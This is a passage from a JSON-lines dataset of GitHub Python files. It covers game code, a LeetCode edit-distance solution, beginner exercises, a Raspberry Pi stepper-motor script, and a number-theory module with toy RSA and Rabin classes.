})\n","repo_name":"abhishek-ram/watg-bots","sub_path":"usersys/mappings/xml/payment_status_xml2html.py","file_name":"payment_status_xml2html.py","file_ext":"py","file_size_in_byte":2582,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"33637073493","text":"#Embedded file name: c:/depot/games/branches/release/EVE-TRANQUILITY/carbon/common/script/entities/Spawners/actionProcSpawner.py\nimport GameWorld\nimport cef\n\nclass ActionProcSpawner(cef.RuntimeSpawner):\n __guid__ = 'cef.ActionProcSpawner'\n\n def __init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, posProp, rotProp):\n position = GameWorld.GetPropertyForCurrentPythonProc(posProp)\n rotation = GameWorld.GetPropertyForCurrentPythonProc(rotProp)\n cef.RuntimeSpawner.__init__(self, entitySceneID, dynamicSpawnID, recipeTypeID, position, rotation)","repo_name":"alexcmd/eve","sub_path":"eve-8.21.494548/carbon/common/script/entities/Spawners/actionProcSpawner.py","file_name":"actionProcSpawner.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"32"} +{"seq_id":"13633370003","text":"class Solution:\n # opt[m][n] is the minimum edit distance required for word1[:m+1] and word2[:n+1]\n # if word1[m] == word2[n]: opt[m][n] = opt[m-1][n-1]\n # else:\n # 1: replace a character opt[m][n] = opt[m-1][n-1] + 1\n # 2: delete a character from word1 opt[m][n] = opt[m-1][n] + 1\n # 3: insert a charcter to word1 opt[m][n] = opt[m][n-1] + 1\n # opt[m][n] = minimum of above 3 cases.\n # Since we add a padding for opt, when we consider the solution at position (m,n)\n # We are checking the char of word1[m-1] and word2[n-1]\n # null h o r s e\n # null 0 1 2 3 4 5\n # r 1 N N N N N\n # o 2 N N N N N\n # s 3 N N N N N\n def minDistance(self, word1: str, word2: str) -> int:\n self.word1=word1\n self.word2=word2\n self.opt=[[None]*(len(word2)+1) for i in range(len(word1)+1)]\n for i in range(len(word2)+1):\n self.opt[0][i] = i\n for i in range(len(word1)+1):\n self.opt[i][0] = i\n return self.helper(len(word1),len(word2))\n\n \n def helper(self,m,n):\n if self.opt[m][n] is not None:\n return self.opt[m][n]\n if self.word1[m-1] == self.word2[n-1]:\n self.opt[m][n]=self.helper(m-1,n-1)\n else:\n self.opt[m][n]=min(self.helper(m-1,n-1)+1,self.helper(m,n-1)+1,self.helper(m-1,n)+1)\n return self.opt[m][n]\n \n \n ","repo_name":"ruifan831/leetCodeRecord","sub_path":"72_Edit_Distance.py","file_name":"72_Edit_Distance.py","file_ext":"py","file_size_in_byte":1530,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"5716751029","text":"# -*- coding: utf-8 -*-\n# @Time : 2021/8/10 21:39 下午\n# @Author : HanChen\n# @File : 7_8.py\n# @Software: Sublime Text\n\n# ------------------ example01 ------------------\n\"\"\"\n7-8 熟食店:创建一个名为 sandwich_orders 的列表,在其中包含各种三明治的名字;再创建一个名为 finished_sandwiches 的空列表。\n 遍历列表 sandwich_orders,对于其中的每种三明治,都打印一条消息,如 I made your tuna sandwich,并将其移到列表finished_sandwiches。\n 所有三明治都制作好后,打印一条消息,将这些三明治列出来。\n\"\"\"\nsandwich_orders = ['veggie', 'grilled cheese', 'turkey', 'roast beef']\nfinished_sandwiches = []\n\nwhile sandwich_orders:\n current_sandwich = sandwich_orders.pop()\n print(\"I'm working on your \" + current_sandwich + \" sandwich.\")\n finished_sandwiches.append(current_sandwich)\n\nprint(\"\\n\")\nfor sandwich in finished_sandwiches:\n print(\"I made a \" + sandwich + \" sandwich.\")\n# ------------------ example01 ------------------\n","repo_name":"HanChen1988/PythonStudy","sub_path":"Book/BookNo001/Chapter_07/python_work/7_8.py","file_name":"7_8.py","file_ext":"py","file_size_in_byte":1030,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"35530260348","text":"#!/usr/bin/python\n\n##--Michael duPont (flyinactor91.com)\n##--Turns a stepper motor based on the current gear setting. Higher gear means faster motor\n\nimport RPi.GPIO as GPIO\nimport time\n\nsevenseg = False\n\nif sevenseg:\n\tfrom Adafruit_7Segment import SevenSegment\n\tsegment = SevenSegment(address=0x70)\n\nGPIO.setmode(GPIO.BCM)\n\n#Setup Buttons\nstepUpPin = 25\nstepDownPin = 18\nGPIO.setup(stepUpPin , GPIO.IN)\nGPIO.setup(stepDownPin , GPIO.IN)\n\n#Display Function\ndef setNumber(value):\n\tif value < 0: segment.setColon(True)\n\telse: segment.setColon(False)\n\tsegment.writeDigit(0 , (abs(value) / 1000)%10)\n\tsegment.writeDigit(1 , (abs(value) / 100)%10)\n\tsegment.writeDigit(3 , (abs(value) / 10)%10)\n\tsegment.writeDigit(4 , abs(value) % 10)\n\ndelay = [0,20,17,14,12,10,8,7,6,5,4,3,2] #milliseconds\ngear , count = 0 , 0\nupdate = True\n\n#Main Loop\nwhile True:\n\tif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == True):\n\t\tif gear < 12 and count == 15:\n\t\t\tgear += 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepDownPin) == False) and (GPIO.input(stepUpPin) == True):\n\t\tif gear > -12 and count == 15:\n\t\t\tgear = gear - 1\n\t\t\tcount = 0\n\t\t\tupdate = True\n\telif (GPIO.input(stepUpPin) == False) and (GPIO.input(stepDownPin) == False):\n\t\tgear , count = 0 , 0\n\t\tupdate = True\n\tif count < 15: count += 1\n\t#print gear\n\tif sevenseg and update:\n\t\tsetNumber(gear)\n\t\tupdate = False\n\tif gear > 0: forward(int(delay[gear]) / 1000.0, 1)\n\telif gear < 0: backwards(int(delay[abs(gear)]) / 1000.0, 1)\n\telse: time.sleep(0.1)\n","repo_name":"flyinactor91/Raspi-Hardware","sub_path":"Motors/StepSpeed.py","file_name":"StepSpeed.py","file_ext":"py","file_size_in_byte":1511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"43053800299","text":"import sys\r\nimport json\r\n\r\ndef main():\r\n path = sys.argv[1]\r\n with open(path, \"r\", encoding=\"utf-8\") as fp:\r\n color_dict = json.load(fp)\r\n new_dict_arr = []\r\n for i, key in enumerate(color_dict):\r\n new_elem = {\r\n \"name\": key,\r\n \"color\": color_dict[key],\r\n \"sort_val\": i,\r\n \"is_active\": True\r\n }\r\n new_dict_arr.append(new_elem)\r\n with open(sys.argv[2], 'w', encoding=\"utf-8\") as fp:\r\n json.dump(new_dict_arr, fp, ensure_ascii=False, indent=4)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"R-Imai/dailyProgress-calculation","sub_path":"tools/color_config_update.py","file_name":"color_config_update.py","file_ext":"py","file_size_in_byte":579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"8715315456","text":"# 1. Set the variable `given_name` to the string \"Addison\".\ngiven_name = \"Addison\"\n\n# ------------------------------------------------------------------------------\n# 2. You have 20 candies that you must divide equally among 6 people. How many candies will be left over?\n# Set variables for `candies`, `people`, `left_over` to make your tests pass.\ncandies = 20\npeople = 6\nleft_over = candies % people\n\n# ------------------------------------------------------------------------------\n# 3. Create a function called `greeting` that returns \"Hello, !\",\n# where is the name given as an argument to the function.\ndef greeting(name):\n return f\"Hello, {name}!\"\n\n\n# ------------------------------------------------------------------------------\n# 4. Create a function called `is_odd` that, given a number, will\n# return true if the number is odd and false if it is not. An odd number is a\n# number which, when divided by 2, has a remainder of 1 or -1.\n\n# USING TRY/EXCEPT (I'm still trying to wrap my head around\n# try/except, even after getting this to work!):\ndef is_odd(number):\n output = False\n try:\n output = number % 2 == 1 or number % 2 == -1\n except TypeError:\n print(\"Does not compute\")\n return output\n\n# USING IF/ELSE:\n# def is_odd(number):\n# if number % 2 == 1 or number % 2 == -1:\n# return True\n# else:\n# return False\n\n# ------------------------------------------------------------------------------\n# 5. Create a function called `is_even` that, given a number, will\n# return true if the number is even and false if it is not. An even number is a\n# number which, when divided by 2, has a remainder of 0.\ndef is_even(number):\n #USING IS_ODD\n # return bool((not is_odd(number)) and (type(number) is int) and (number is not 0))\n\n # USING IF/ELSE:\n if number % 2 == 0:\n return True\n else:\n return False\n\n\n\n# ------------------------------------------------------------------------------\n# 6. Create a function called `fahrenheit_to_celsius` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Celsius.\ndef fahrenheit_to_celsius(fahrenheit):\n celsius = (fahrenheit - 32) * 0.5556\n return int(celsius)\n\n# ------------------------------------------------------------------------------\n# 7. Create a function called `celsius_to_fahrenheit` that takes a\n# Celsius temperature as an argument and returns the\n# temperature in Fahrenheit.\ndef celsius_to_fahrenheit(celsius):\n fahrenheit = (celsius*1.8000) + 32\n return fahrenheit\n\n\n# ------------------------------------------------------------------------------\n# 8. Create a function called `fahrenheit_to_kelvin` that takes a\n# Fahrenheit temperature as an argument and returns the\n# temperature in Kelvin. This function must use your previous\n# fahrenheit_to_celsius function.\n# Absolute zero (0 K) is equivalent to −273.15 C.\n# 1 degree Kelvin equals 1 degree Celsius.\ndef fahrenheit_to_kelvin(fahrenheit):\n kelvin = fahrenheit_to_celsius(fahrenheit) + 273.15\n return kelvin\n\n# ------------------------------------------------------------------------------\n# 9. Create a function called `lesser` that takes two numbers as\n# arguments and returns the lesser of them. This function should\n# use an if/else statement.\ndef lesser(num1, num2):\n if num1 < num2:\n return num1\n elif num1 > num2:\n return num2\n else:\n return \"num1 and num2 are equal.\"\n\n\n# ------------------------------------------------------------------------------\n# 10. Create a function called `multigreeting` that takes a name\n# and a language code and returns a version of \"Hello, !\"\n# in the specified language. The supported languages and their\n# translations are below.\n#\n# en - Hello, !\n# es - ¡Hola, !\n# fr - Bonjour, !\n# eo - Saluton, !\n#\n# If any other language code is used, return nothing.\ndef multigreeting(name, language):\n # DICTIONARY\n try:\n multilanguage_greeting_dict = {\n \"en\": f\"Hello, {name}!\",\n \"es\": f\"¡Hola, {name}!\",\n \"fr\": f\"Bonjour, {name}!\",\n \"eo\": f\"Saluton, {name}!\"\n }\n return multilanguage_greeting_dict[language]\n except:\n return\n \n #NO DICTIONARY\n # if language == \"en\":\n # return \"Hello, \" + name + \"!\"\n # elif language == \"es\":\n # return \"¡Hola, \" + name + \"!\"\n # elif language == \"fr\":\n # return \"Bonjour, \" + name + \"!\"\n # elif language == \"eo\":\n # return \"Saluton, \" + name + \"!\"\n # else:\n # return\n\n# ------------------------------------------------------------------------------\n# 11. The greatest common divisor (https://en.wikipedia.org/wiki/Greatest_common_divisor)\n# is the largest integer that, given two other integers, can be divided into them. For\n# example, the greatest common divisor of 24 and 81 is 3. The greatest common divisor of\n# 10 and 25 is 5.\n#\n# One method of calculating the greatest common divisor is the \"binary GCD algorithm.\"\n# (https://en.wikipedia.org/wiki/Greatest_common_divisor#Binary_GCD_algorithm)\n# It can be written out like the following:\n#\n# Input: a, b positive integers\n# Output: The greatest common divisor, which is g * 2**d\n# d = 0\n# while a and b are both even\n# a = a/2\n# b = b/2\n# d = d + 1\n# while a != b\n# if a is even then a = a/2\n# else if b is even then b = b/2\n# else if a > b then a = (a – b)/2\n# else b = (b – a)/2\n# g = a\n# output g * 2**d\n\n\n# Write a function called `gcd` that takes two arguments and returns the greatest\n# common divisor using the instructions above.\ndef gcd(a, b):\n # TRYING TERNARY OPERATORS--THIS DIDN'T WORK\n # d = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # d = d + 1\n # while a != b:\n # a = a / 2 if is_even(a) else b = b / 2 if is_even(b) else a = (a - b) / 2 if a > b else b = (b - a) / 2\n # ALTERNATELY===\n # a = a / 2 if is_even(a) else (a - b) / 2\n # b = b / 2 if is_even(b) else (b - a) / 2\n # ===\n # g = a\n # return g * 2**d\n\n # TRYING A TUPLE WITH TERNARY OPERATORS\n counter = 0\n while is_even(a) and is_even(b):\n a = a / 2\n b = b / 2\n counter += 1\n ab_tuple = (a, b)\n while a != b:\n while is_even(a) or is_even(b):\n ab_tuple = (a/2, b/2) if is_even(a) and is_even(b) else (a/2, b) if is_even(a) \\\n and not is_even(b) else (a, b/2) if not is_even(a) and is_even(b) else (a, b)\n a = ab_tuple[0]\n b = ab_tuple[1]\n ab_tuple = ((a-b)/2, b) if a > b else (a, (b-a)/2)\n a = ab_tuple[0]\n b = ab_tuple[1]\n return a * 2**counter\n\n # ORIGINAL\n # counter = 0\n # while is_even(a) and is_even(b):\n # a = a / 2\n # b = b / 2\n # counter += 1\n # while a != b:\n # if is_even(a):\n # a = a / 2\n # elif is_even(b):\n # b = b / 2\n # elif a > b:\n # a = (a - b) / 2\n # else:\n # b = (b - a) / 2\n # g = a\n # return g * 2**counter\n","repo_name":"Momentum-PT-Team-3/python-problem-set-1-arieljsmith","sub_path":"problem_set_1.py","file_name":"problem_set_1.py","file_ext":"py","file_size_in_byte":7125,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"28627058785","text":"import random \nfrom collections import Counter\nimport time\nimport math\nfrom functools import wraps\nimport json\n# =====================================================================================\n# 注释掉两条分割线之间的东西来使用\n\n\n# import numpy as np \n# import torch\n# from torch import nn\n# import pandas as pd\n# import click\n# # import time\n# # from functools import wraps\n\n\n# # 当我对func函数装饰的时候,自然需要传入func作为实参\n# # @add_time 等价于 add_time(func),因此我有一个新的函数g接住add_time的返回值,这里假设返回的函数是wrap_func\n# # 当我执行g的时候,实际上执行的是wrap_func,而执行wrap_func实际上主体在执行func,因此wrap_func的参数需要传func的参数\n# def add_time(func):\n# # 这个wraps是固定写法,为了函数文档和函数名字的不变\n# @wraps(func)\n# def wrap_func(*args,**kwds):\n# s = time.time()\n# # 这是我的函数的主体部分,我希望在前后加上一些东西\n# ans = func(*args,**kwds)\n# e = time.time()\n# print(f'Time for {func.__name__} is {e - s}s')\n# return ans\n# return wrap_func\n\n\n\n# class BatchNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(0,2,3),keepdim=True)) / X.std(dim=(0,2,3),keepdim=True)\n\n# class LayerNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(1,2,3),keepdim=True)) / X.std(dim=(1,2,3),keepdim=True)\n\n# class InstanceNorm(nn.Module):\n# '''\n# input X is (B,C,H,W)\n# '''\n# def __init__(self):\n# super().__init__()\n\n# def forward(self,X):\n# return (X - X.mean(dim=(2,3),keepdim=True)) / X.std(dim=(2,3),keepdim=True)\n\n\n# def shape_conv(h,h_k,stride,padding):\n# return int((h - h_k + stride + 2 * padding) / stride)\n\n# def shape_trans_conv(h,h_k,stride,padding,out_padding=0):\n# \"\"\"\n# H_out = (H_in - 1)*stride - 2*padding + kernel_size + out_padding\n# If we choose stride = 2,kernel_size = 2 and both padding are 0\n# Then the H and W are doubled\n# \"\"\"\n# return int(\n# (h - 1) * stride - 2 * padding + h_k + out_padding\n# )\n\n\n# def draw_table(m,mode):\n# \"\"\"\n# mode = 'add' or 'mul'\n# \"\"\"\n\n# sheet = np.zeros((m,m))\n# if mode == 'add':\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i + j) % m\n# else:\n# for i in range(m):\n# for j in range(m):\n# sheet[i,j] = (i * j) % m\n\n# ans = pd.DataFrame(sheet)\n# ans.to_excel(f'm={m}_mode={mode}.xlsx')\n\n# class PixelNorm(nn.Module):\n# def __init__(self):\n# super(PixelNorm,self).__init__()\n \n# def forward(self,X):\n# tmp = X * X\n# return X / torch.sqrt(tmp.sum(dim=1,keepdim=True))\n\n# class Maxout(nn.Module):\n# def __init__(self,num_in,num_out,pieces):\n# super(Maxout,self).__init__()\n# self.W = nn.Parameter(torch.randn(num_in,num_out,pieces))\n# self.b = nn.Parameter(torch.randn(num_out,pieces))\n# def forward(self,X):\n# return torch.from_numpy(np.max(np.tensordot(X.detach().numpy(),self.W.detach().numpy(),axes=1) + self.b.detach().numpy(),axis=2))\n\n\n\n\n# =====================================================================================\n\n\n\ndef add_time(func):\n # 这个wraps是固定写法,为了函数文档和函数名字的不变\n @wraps(func)\n def wrap_func(*args,**kwds):\n s = time.time()\n # 这是我的函数的主体部分,我希望在前后加上一些东西\n ans = func(*args,**kwds)\n e = time.time()\n print(f'Time for {func.__name__} is {e - s}s')\n return ans\n return wrap_func\n\n\ndef __lcm(a:int,b:int) -> int:\n return a*b//gcd(a,b)\n\ndef lcm(*a):\n '''lcm(3,4,5,6,7)'''\n assert len(a) > 1,f'The number of input of function lcm must be bigger than 1'\n ans = __lcm(a[0],a[1])\n for item in a[2:]:\n ans = __lcm(ans,item)\n return ans\n pass\n\n\n\ndef __gcd(a,b):\n a = abs(a)\n b = abs(b)\n if a == 0:\n return b\n if b == 0:\n return a\n\n while a!=0 and b!=0:\n a,b = b,a%b\n\n if b == 0:\n return a\n if a == 0:\n return b\n \n\n\ndef gcd(*a):\n '''\n 求多个整数的最大公因数\n gcd(12,32,45,64)\n '''\n # for item in a:\n # if item == 1:\n # return 1\n # if len(a) == 2:\n # return __gcd(a[0],a[1])\n # else:\n # d = __gcd(a[0],a[1])\n # for i in range(2,len(a)):\n # d = __gcd(d,a[i])\n # if d == 1:\n # return d\n # return d\n l = len(a)\n assert l>1,f'The length of list should be bigger than 1'\n gcd = 1\n for i in range(l-1):\n x = abs(a[i])\n y = abs(a[i+1])\n while x!=0 and y!=0:\n x,y = y,x%y\n if x == 0:\n gcd = y\n else:\n gcd = x\n if gcd == 1:\n return gcd\n return gcd\n\n\ndef is_prime (n):\n n = int(n)\n if n == 1:\n return False\n\n if n > 1e6:\n return is_large_prime(int(n))\n upper = int(n ** 0.5)\n upper += 1\n for i in range(2,upper):\n if n % i == 0 :\n return False\n return True\n\n\ndef get_prime (N):\n '''获取前小于等于N的所有素数'''\n a = [True] * (N + 1)\n indices = list(range(2,N + 1))\n for index in indices:\n if not a[index]:\n pass \n else :\n i = 2\n while index * i <= N :\n a[i * index] = False \n i += 1\n ans = list(filter(lambda x:a[x],indices))\n return ans\n\n\ndef bezout(a,b):\n '''计算贝祖等式'''\n s2 = 0\n s1 = 1\n t2 = 1\n t1 = 0\n q = int(a / b)\n r2 = a % b\n r1 = b\n\n while r2 != 0:\n s2,s1 = -q * s2 + s1 , s2\n t2,t1 = -q * t2 + t1 , t2\n q = int(r1 / r2)\n r2,r1 = -q * r2 + r1 , r2\n return (s2,t2)\n\n\n\n\n# @add_time\ndef get_inverse(a,m):\n '''求解a模m的逆元'''\n tmp = bezout(a,m)[0]\n while tmp <= 0:\n tmp += m\n return tmp\n\n\ndef china_res(b:list,m:list):\n '''\n the first element of returned tuple is the ANS\\n\n the second element of returned tuple is the product of M_i\\n\n '''\n M = 1\n for item in m:\n M *= item\n \n ans = 0\n \n for i in range(len(m)):\n m_i = m[i]\n M_i = int(M / m_i)\n M_i_inverse = get_inverse(M_i,m_i)\n ans += int(b[i] * M_i * M_i_inverse)\n \n # ans %= M\n ans = ans % M\n # print(ans)\n # print(M)\n return (ans,M)\n\ndef ten2two(n:int,total_bits:int=8):\n '''n should be positive'''\n sign = (n >= 0)\n n = abs(n)\n tmps = []\n while n != 0:\n tmps.append(int(n&1))\n n >>= 1\n tmps.append(0)\n if not sign:\n for i in range(len(tmps)):\n tmps[i] = 1 if tmps[i] == 0 else 0\n tmps[0] += 1\n for i in range(len(tmps)):\n if tmps[i] == 2:\n tmps[i] = 0\n if i < len(tmps) - 1:\n tmps[i + 1] += 1\n else:\n tmps.append(1)\n tmps = tmps[::-1]\n tmps = ''.join(str(item) for item in tmps)\n tmps = tmps[0] + tmps[0]*(total_bits - len(tmps)) + tmps[1:] if total_bits >= len(tmps) else tmps[len(tmps) - total_bits:]\n return tmps\n\n\ndef euler_function(n:int):\n '''求n的欧拉函数phi(n)'''\n N = n\n primes = get_prime(n)\n p_set = []\n for p in primes:\n while n % p == 0:\n n /= p\n p_set.append(p)\n p_set = set(p_set)\n ans = N\n for p in p_set:\n ans *= (1 - 1/p)\n return int(ans)\n\n\ndef solve_foce(a:int,b:int,m:int):\n '''\n solve_first_order_congruence_equation\n return value is a tuple\n the first element of tuple is constant\n the second element of tuple is the coefficient of t\n '''\n gcd_a_m = gcd(a,m)\n a1 = get_inverse(int(a/gcd_a_m), int(m/gcd_a_m))\n a2 = b / gcd_a_m * a1\n a2 = int(a2)\n return (a2,int(m/gcd_a_m))\n\n\n\n# @add_time\ndef fast_power(base:int,power:int,m:int) -> int:\n '''\n return base^power mod m\n '''\n ans = 1\n while power != 0:\n if power & 1:\n ans = ans * base % m\n base = base * base % m\n power >>= 1\n return ans \n\ndef get_all_factors(n:int):\n '''获取n所有的因数'''\n s = set()\n for i in range(1,int(math.sqrt(n) + 1)+1):\n if n % i == 0:\n s.add(i)\n s.add(n // i)\n return s\n\n\ndef factor(n:int):\n '''\n factor(n)\n 对n进行素因数分解\n 算数基本定理进行分解\n '''\n l = []\n target = int(math.sqrt(n)) + 1\n for i in range(2,target+1):\n while n % i == 0:\n n = n // i\n l.append(i)\n if n != 1:\n l.append(n)\n return dict(Counter(l))\n\ndef euler_judge(a:int,p:int):\n '''判断a是不是模p的平方剩余'''\n ans = fast_power(a,(p-1)//2,p)\n return ans if ans==1 else ans - p\n\ndef legendre(a:int,p:int):\n '''计算勒让德符号(a/p)'''\n if a % p == 0:\n return 0\n return euler_judge(a,p)\n\ndef theorem_4_3_4(a,p):\n if a == 2:\n return (-1) ** ((p**2-1)/8)\n elif gcd(a,2*p) == 1:\n tmp = 0\n for k in range(1,(p-1)//2 + 1):\n tmp += int(a*k/p)\n return (-1) ** tmp\n else:\n print(f'gcd(a,2p) != 1')\n\n\ndef m2m(m,e,b):\n '''\n return m^e % b\n '''\n result=1\n m1=m\n while(e>=1):\n e1=e%2\n if(e1==1):\n result=(m1*result)%b\n m1=(m1**2)%b\n e=e//2\n return int(result)\n\n# class RSA():\n# @staticmethod\n# def hello_static():\n# print(f'This is {RSA.__name__} static method!')\n\n# @classmethod\n# def hello_class(cls):\n# print(f'This is {RSA.__name__} class method!')\n\n# def __init__(self,p=19260817,q=19260817):\n# self.p = p\n# self.q = q\n# self.n = p * q\n# self.phi = (self.p -1) * (self.q -1)\n# self.e = random.randint(2,self.phi)\n# while gcd(self.e,self.phi) != 1:\n# self.e = random.randint(2,self.phi)\n# self.d = get_inverse(self.e,self.phi)\n# self.char_to_index = {}\n# self.index_to_char = {}\n# self.set_char()\n \n# def __func(self,num):\n# if num < 10:\n# return '0' + str(num)\n# else :\n# return str(num)\n \n# def set_char(self,char_set = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz' + ' ,.?!' + '0123456789'):\n \n \n# self.char_set = char_set\n# indices = [self.__func(i) for i in range(len(self.char_set))]\n# self.char_to_index = {k:v for k,v in zip(self.char_set,indices)}\n# self.index_to_char = {k:v for v,k in self.char_to_index.items()}\n\n\n# def digitalize(self,m):\n# if not isinstance(m,str):\n# m = str(m)\n# ans = []\n# for item in m:\n# ans.append(self.char_to_index.get(item))\n# return ''.join(ans)\n \n# def dedigitalize(self,c):\n# if not isinstance(c,str):\n# c = str(c)\n# ans = []\n# for i in range(0,len(c),2):\n# ans.append(self.index_to_char.get(c[i] + c[i+1]))\n# return ''.join(ans)\n \n# def lock(self,m):\n# if not isinstance(m,int):\n# m = int(m)\n# c = m2m(m,self.e,self.n)\n# return c\n\n# def unlock(self,c):\n# if not isinstance(c,int):\n# c = int(c)\n# m = m2m(c,self.d,self.n)\n# return m\n \ndef two2ten(n:str)->int:\n n = list(n)[::-1]\n ans = 0\n for index in range(len(n)):\n ans += int(n[index]) * 2**index\n return ans\n\n\ndef func(n:str):\n k,n = n.split('.')\n base = 10 ** (len(n))\n n = int(n)\n count = 0\n ans = []\n for i in range(40):\n n *= 2\n ans.append(int(n // base))\n count += 1\n if count == 4:\n ans.append(' ')\n count = 0\n n = n % base\n if n == 0:\n break\n weishu = ''.join(str(item) for item in ans)\n\n return k + '.' + weishu\n\ndef jianfa(a:str,b:str):\n '''二进制减法 a需要比b大'''\n A = [0] * len(a)\n B = [0] * len(b)\n for i in range(len(a)):\n A[i] = int(a[i])\n for i in range(len(b)):\n B[i] = int(b[i])\n a = A\n b = B\n a = a[::-1]\n b = b[::-1]\n for index in range(len(b)):\n a[index] -= b[index]\n for index in range(len(a)):\n while a[index] < 0:\n a[index] += 2\n a[index + 1] -= 1\n a = a[::-1]\n return ''.join(str(item) for item in a)\n\ndef get_quadratic_residue(m:int):\n '''获取模m的二次剩余'''\n ans = set()\n for x in range(m):\n a = x**2 % m\n if gcd(a, m) == 1:\n ans.add(a)\n return ans\n\ndef theorem_4_6_3(a:int,p:int):\n '''课本149页的定理4.6.3'''\n assert p%2==1 and is_prime(p),f'p={p} is not an odd prime number!'\n \n t = int(factor(p-1).get(2,0))\n s = (p-1) // 2**t\n a_inverse = get_inverse(a,p)\n\n while True:\n n = random.randint(1,p)\n if gcd(n,p) == 1 and legendre(n,p) != 1:\n break\n b = fast_power(n,s,p)\n ans = [0] * t\n ans[-1] = fast_power(a,(s+1)//2,p)\n for index in range(t-2,-1,-1):\n flag = fast_power((a_inverse * ans[index + 1]**2),2**(index),p)\n if flag % p == 1:\n j = 0\n else:\n j = 1\n ans[index] = (ans[index + 1] * b**(j * 2**(t - index - 2))) % p\n return ans[0]\n\ndef theorem_4_6_2(a:int,p:int,q:int):\n '''solve this : x^2 mod p*q = a'''\n assert is_prime(p) and (p+1) % 4 == 0,f'You cannot use theorem_4_6_2 because p={p} is not prime like 4k+3'\n assert is_prime(q) and (q+1) % 4 == 0,f'You cannot use theorem_4_6_2 because q={q} is not prime like 4k+3'\n assert legendre(a,p)==1, f'You cannot use theorem_4_6_2 because p={p} does not satisfiy legendre'\n assert legendre(a,q)==1, f'You cannot use theorem_4_6_2 because q={q} does not satisfiy legendre'\n\n s,t = bezout(q,p)\n s,t = s*q,t*p\n s1 = fast_power(a,(p+1)//4,p)\n t1 = fast_power(a,(q+1)//4,q)\n ans = [0] * 4\n ans[0] = s1*s + t1*t\n ans[1] = -s1*s + t1*t\n ans[2] = s1*s - t1*t\n ans[3] = -s1*s - t1*t\n for index in range(len(ans)):\n ans[index] %= (p*q)\n return tuple(ans)\n\n\n# @click.command()\n# @click.option('--a',type=int)\n# @click.option('--m',type=int)\ndef enumerate_quadratic(a,m):\n '''暴力求解x^2 mod m == a'''\n ans = []\n for x in range(m):\n if x**2 % m == a:\n ans.append(x)\n print(ans)\n return tuple(ans)\n\nclass Rabin():\n def __init__(self,p=19260803,q=19260767):\n self.p = p\n self.q = q\n self.n = self.p * self.q \n self.charset = ' ,.?!' + '0123456789' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 'abcdefghijklmnopqrstuvwxyz'\n self.char_to_index = {\n char:index + 12345678 for index,char in enumerate(self.charset)\n }\n self.index_to_char = {\n index:char for char,index in self.char_to_index.items()\n }\n self.group_len = 16\n def lock(self,m):\n cypertext = ''\n m = str(m)\n for char in m:\n index = self.char_to_index[char]\n c = str(fast_power(index,2,self.n))\n c = '0'*(self.group_len - len(c)) + c\n cypertext += c\n return cypertext\n\n def unlock(self,c):\n c = str(c)\n m = ''\n for index in range(0,len(c),self.group_len):\n c_single = int(c[index:index+self.group_len])\n c_num = theorem_4_6_2(c_single,self.p,self.q)\n for num in c_num:\n if num < 1e9:\n m += self.index_to_char[num]\n break\n\n return m\n\n\ndef theorem_4_7_1(p:int):\n '''\n 课本P159定理4.7.1\n 求解x^2 + y^2 = p\n p = 2 or p = 4k + 1\n '''\n assert p==2 or p%4==1 ,'p != 2 or p is not like 4k + 1'\n x = theorem_4_6_3(-1,p)\n y = 1\n m = (x**2 + y**2)//p\n while m != 1:\n u = x % m \n v = y % m\n x,y = (u*x + v*y)//m , (u*y - v*x)//m\n m = (x**2 + y**2) //p\n return x,y\n\ndef get_exp(a,m):\n '''获得a模m的指数e'''\n assert gcd(a,m) == 1,f'gcd({a},{m})不是1,不满足指数的条件!'\n i = 1\n while fast_power(a,i,m) != 1:\n i += 1\n return i\n\ndef is_primitive_root(a:int,m:int):\n '''判断a是不是模m原根'''\n assert gcd(a,m) == 1,f'a = {a} , m = {m} 并不互素,不满足原根或指数的判断条件!'\n flag = True\n phi = euler_function(m)\n e = get_exp(a,m)\n return e == phi\n pass\n\n\ndef get_prime_factors(n):\n '''获取n所有的素因子'''\n l = list(factor(n).keys())\n return l\n\n\ndef get_primitive_root(n):\n '''求n的原根'''\n # assert is_prime(n) and n != 2,f'{n} is not odd prime number!'\n if is_prime(n) and n != 2:\n l = get_prime_factors(n-1)\n l = list(map(lambda x:(n-1)//x,l))\n ans = []\n for g in range(2,n):\n if gcd(g,n) != 1:\n continue\n flag =True\n for index in l:\n if fast_power(g,index,n) == 1:\n flag = False\n break\n if flag:\n ans.append(g)\n return ans\n else:\n print(f'm = {n} is not odd prime number, so using enumerate to get all primitive roots of m = {n}')\n ans = []\n for i in range(1,n):\n try:\n if is_primitive_root(i,n):\n ans.append(i)\n except AssertionError:\n pass\n return ans\n pass\n \n\n\nclass RSA():\n def __init__(self):\n super().__init__()\n self.p = get_large_prime()\n self.q = get_large_prime()\n self.n = self.p * self.q\n self.len = len(str(self.n))\n self.phi = (self.p-1) * (self.q-1)\n # self.bias = 132435343242330\n # self.charset = '0123456789' + 'abcdefghijklmnopqrstuvwxyz' + 'ABCDEFGHIJKLMNOPQRSTUVWXYZ' + 